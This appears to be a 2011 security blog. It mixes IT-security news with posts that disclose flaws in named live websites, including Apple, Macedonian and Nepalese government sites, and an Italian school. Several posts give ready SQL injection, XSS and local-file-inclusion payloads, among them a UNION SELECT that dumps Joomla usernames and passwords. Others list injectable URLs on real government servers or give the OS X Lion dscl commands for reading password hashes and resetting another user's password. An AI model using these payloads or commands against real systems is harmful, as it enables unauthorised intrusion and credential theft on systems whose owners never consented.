Monday, September 26, 2011

Facebook track your cookies even after logout !

1



According to Australian technologist Nik Cubrilovic: 'Logging out of Facebook is not enough.' He added, Even after you are logged out, Facebook is able to track your browser's page every time you visit a website. He wrote in his blog 'With my browser logged out of Facebook, whenever I visit any page with a Facebook like button, or share button, or any other widget, the information, including my account ID, is still being sent to Facebook.'

After explaining the cookies behavior he also suggested a way to fix the tracking problem: 'The only solution to Facebook not knowing who you are is to delete all Facebook cookies.'
Give firefox addon for auto delete FB cookies after logging out.

Read more

Tuesday, September 20, 2011

OS X Lion bugs let hackers view, change local user passwords

0



The latest version of OS X Lion allows any user to easily change the password of any local account, due to permissions oversights on Apple's part. The news comes less than a month after another Lion vulnerability that let users bypass LDAP without a password gained notoriety.

Originally reported by Defence in Depth blogger Patrick Dunstan, the root of the newly discovered problem in Mac OS X 10.7 is tied to the user-specific shadow files used in modern OS X platforms. These files are essentially hash databases and contain, among other things, the user's encrypted passwords. Ideally, they should be accessible only via high-privilege accounts.

According to Dunstan, Apple dropped the ball in terms of how Lion handles privilege. "Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data," Dunstan wrote. "This is accomplished by extracting the data straight from Directory Services."

Any user can accomplish this trick by simply invoking the directory services listing using the /Search/ path -- for example, $ dscl localhost -read /Search/Users/bob (where "bob" is the username). This causes Lion OS X to spew out the contents of Bob's shadow hash file, including data that can be used to crack Bob's password with a simple script, such as a Python script written by Dunstan.

Making matters worse, running such a script wouldn't necessarily be required to gain access to Bob's account. Using Directory Services, a user could change a logged-in user's password -- without requiring authentication -- using this command: $ dscl localhost -passwd /Search/Users/bob

Notably, the targeted user's account could just as easily include admin privileges.

In order to pull off this hack, the perpetrator would require local access, though an outsider using social engineering could dupe a user to surrender the information. Additionally, a malicious insider could use his or existing information and wreak havoc if an admin left a machine without first logging out. Further, the user would need to access Lion's Directory Services -- another feat that would not be overly difficult in an environment with relatively lackluster security.

MacFixIt blogger Topher Kessler offered advice on how organizations can avoid being subject to these vulnerabilities. They include disabling automatic log-ins in Mac OS X; enabling sleep and screensaver passwords; disabling guest accounts (as well as accounts not in use); and better managing user privileges, such as allowing no greater permissions than necessary.

Read more

Friday, September 9, 2011

Set.com.mk Xss Vulnerability

0

Read more

Sunday, September 4, 2011

Sep.gov.mk Sql injection Vulnerability

0





Sep.gov.mk (Secretariat for European Affairs) is Vulnerability to Sql injection.





Vul link:
http://sep.gov.mk/Default.aspx?ContentID=%Inject_Here%30

Usernames, Pass, E-mails will not be posted.








Read more

Saturday, August 27, 2011

Apple.com XSS Vulnerability (again)

0





Apple.com is Vulnerability to Xss-Cross Site Scripting. This is my second Xss found on apple site.














Poc:

1.
https://expresslane.apple.com/GetproductgroupList.do?PRKEYS=%3Cscript%3Ealert%28/xss/%29%3C/script%3E

2.

https://expresslane.apple.com/Symptoms.do


By darknessn1k0!a

Read more

Friday, August 12, 2011

TNR Enhanced Joomla Search <= SQL Injection Vulnerability

0








========================================================================================

[o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/

=========================================================================================

[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


[o] PoC

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

Read more

Thursday, August 11, 2011

Friday, July 29, 2011

Declarative Security - Browser Addons for Mozilla Firefox

0





- Clickjacking Defense - Declarative Sec Detector

The X-FRAME-OPTIONS sets a restriction on the framing of a web page for a particular domain. It uses the value DENY and SAMEORIGIN for rendering the contents into a child frame.It is possible to stop the rendering completely in a child frame using DENY as a parameter. The SAMEORIGIN parameter declares that the content can only come
from the parent site and that no third party content rendering is allowed.This addon scans all the HTTP response headers that accompany with the web page and raises a notification in the status bar showing whether the declarative security for Clickjacking is applied on the respective domain or not.
For more details Refer: http://www.usenix.org/event/collsec10/tech/full_papers/Sood.pdf

Download: https://addons.mozilla.org

Read more

Tuesday, July 26, 2011

Nepal.gov SQL Injection Vulnerability

0









#Title: Some Nepal.gov sites
#Risk: (5/5)
#Release Date: 07.26.2011
#Vulnerability discovered by:darknessn1k0!a


http://eproc.dor.gov.np/tender_details.php?tid=82062[SQLI]
http://moe.gov.np/new/index.php?option=CMS&id=69[SQLI]
http://www.tourism.gov.np/page.php?nav=24[SQLI]

Read more

Saturday, July 23, 2011

Apple MacBooks Can Be Hacked Through The Battery

0





Security researcher Charlie Miller is quite well known for his works on Apple products. Today he has come up with a very interesting way to hack the MacBook using the battery. Laptop battery contains its own monitoring circuit which reports the status of the battery to the OS. It also ensure that the battery does not overcharge even when the laptop is turned off.

Miller has discovered that on the MacBooks, the batteries are shipped with the default password set on the chips. It means that if someone knows the default password, the firmware of the battery can be controlled to do many things from simply ruining the battery to installing a malware which reinstalls whenever the OS boots. Miller said that it might even be possible to overload the battery so that it catches fire.

This is what Miller said:
These batteries just aren’t designed with the idea that people will mess with them. What I’m showing is that it’s possible to use them to do something really bad.


You could put a whole hard drive in, reinstall the software, flash the BIOS, and every time it would reattack and screw you over. There would be no way to eradicate or detect it other than removing the battery.

This is a very real threat but such an attack is not likely to occur anytime soon. To successfully carry out the attack, the attacker has to analyze the 2009 software updates from Apple for the password, like Miller has done.

Read more

Friday, July 22, 2011

Inscribe Webmedia SQL Injection Vulnerability

0









Inscribe Webmedia SQL Injection
=========================================================
# Exploit Title : Inscribe Webmedia SQL Injection
# Date : 14 July 2011
# Author : Netrondoank aka netron
# Platform/Tested on: Linux
# myweb : http://www.ilmuhacker.org
# Version : none
# Software Link: : http://www.inscribe.com.my/
# dork : 1997 - 2011 Inscribe Webmedia. All Rights Reserved
======================================================================

# vuln here
http://127.0.0.1//path/news_body.php?id=[sqli]

This Vulnerable For Malaysian CMS Site

Read more

Friday, April 8, 2011

VLC Media Player susceptible to buffer overflow vulnerability

0



According to an advisory from security services provider Secunia, the VLC Media Player is susceptible to a vulnerability in the Libmodplug library which it rates as highly critical. Libmodplug, also known as the ModPlug XMMS Plugin, is reportedly prone to a stack-based buffer overflow issue caused by insufficient validation of user supplied data. This could be exploited by an attacker, for example, to execute arbitrary code on a user's system. For an attack to be successful, a user must first open a specially crafted S3M media file. Secunia notes that this may only affect the precompiled versions.

The vulnerability is confirmed to affect version 1.1.8 of the VLC Media Player, the latest stable release, on Windows and Mac OS X. Other versions may also be affected. Until a patch or update has been released that corrects the issue, users are advised not to open untrusted *.S3M files. At the time of this posting, the VideoLAN project's Security information page does not list the problem.

Read more

Wednesday, March 16, 2011

Friday, March 4, 2011

loto.mk xss vulnerable

0



Loto.mk is vulnerable to xss cross site scripting

http://www.loto.mk/kontakt.asp

Put the appropriate html/javascript code to test the vulnerability.

Read more

Thursday, February 24, 2011

XSSer v1.5 beta Released

0



Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.It contains several options to try to bypass certain filters, and various special techniques of code injection.

Added GTK option + Heuristic test + HTTP Response Splitting (ak.a Induced attack!) + Do(Server) injection + Final code (added DCP & DOM injections) + Update option + Code clean + Bugfixing + New options menu + More advanced statistics system + Updated dorkerers list.

Download: http://sourceforge.net

Video demo: http://blip.tv/file/4806587/

Read more

Tuesday, February 22, 2011

Galilery 1.0 Local File Inclusion Vulnerability

0

$ cat 15_lfi_galilery.1.0.txt
# exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/


PoC :

http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/

cuz:
index.php: $d=$_GET['d'];

Read more

Saturday, February 19, 2011

mns portal sql injection Vulnerability

0



##########################################################################################
# [+] mns portal sql injection Vulnerability
# [+] Portal Name : mns
# [+] software : http://scuolainrete.info/site/index.php
# [+] Author : d3c0der
# [+] Contact : d3c0der@hotmail.com
# [+] homepage : www.attackerz.ir
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerability
#
# [+] sql
#
# www.[site]/webschool/news.php?id=[sqli]
#
# [+] exploit
#
# +union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+login
#
#[------------------------------------------------------------------------------------]
# [+] Demo
#
# www.liceosilvestri.it/webschool/news.php?id=45
#
#
##########################################################################################

Read more

Wednesday, February 16, 2011

New hole in Windows file sharing

0



On the Full Disclosure mailing list, an unknown contributor has disclosed a previously unknown security problem involving files shared via SMB under Windows. A buffer overflow in the heap can be exploited to inject arbitrary code into a system and execute it. The contributor also provided suitable code to demonstrate the problem.
Security firms Vupen and Secunia have confirmed the threat; they were able to reproduce the problem on Windows XP SP3 and Windows Server 2003 SP2. The flaw can be exploited remotely by using overly long server name strings sent in a specially crafted "Browser Election Request" packet. The buffer overflow is triggered via the BowserWriteErrorLogEntry() function in the mrxsmb.sys driver. No user authentication at the server is required.
Microsoft has not yet released a statement, let alone a patch. The best way of protecting systems is to place the access to shared Windows files behind a firewall. If you are connected to a network marked as "public", Windows Firewall already reliably does this.

Source:http://www.h-online.com/

Read more

Google.com xss redirect

0

Read more

Tuesday, February 15, 2011

Hackers Are Targeting Facebook via spreading malware

0



Facebook accounts are becoming favorite targets of hackers. If your account has been hacked, you could be in good company considering Facebook founder Mark Zuckerberg and French President Sarkozy have also been victims. Actually, thousands -- maybe millions -- of Facebook pages have been hacked. The hackers then use the accounts to send out erroneous messages to "friends."
One of your friends seems to have sent you a video or awesome photo or link, and suggests you click on it. The computer screen tells you to log in again to see the video or photo or quiz. But as soon as you sign in, you are giving your information to a hacking site, which now has your screen name and password.You probably would be suspicious of a strange e-mail in your inbox, but when you believe you are getting a link from a friend on a social network, you might not be so cautious.

You have actually been caught by one of the most common forms of hacking called "phishing." Recently estimated 1.5 million Facebook accounts are listed for sale on a website discovered by Verisign's iDefense Labs. The names were sold for as much as $45 for accounts with more than 10 friends. They are considered a way of spreading malware rather than strictly for identity theft.

People who find out that their Facebook accounts have been hacked, should immediately reset their passwords. They should also send Facebook a message, which will allow the company to look into the situation further.

Read more

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting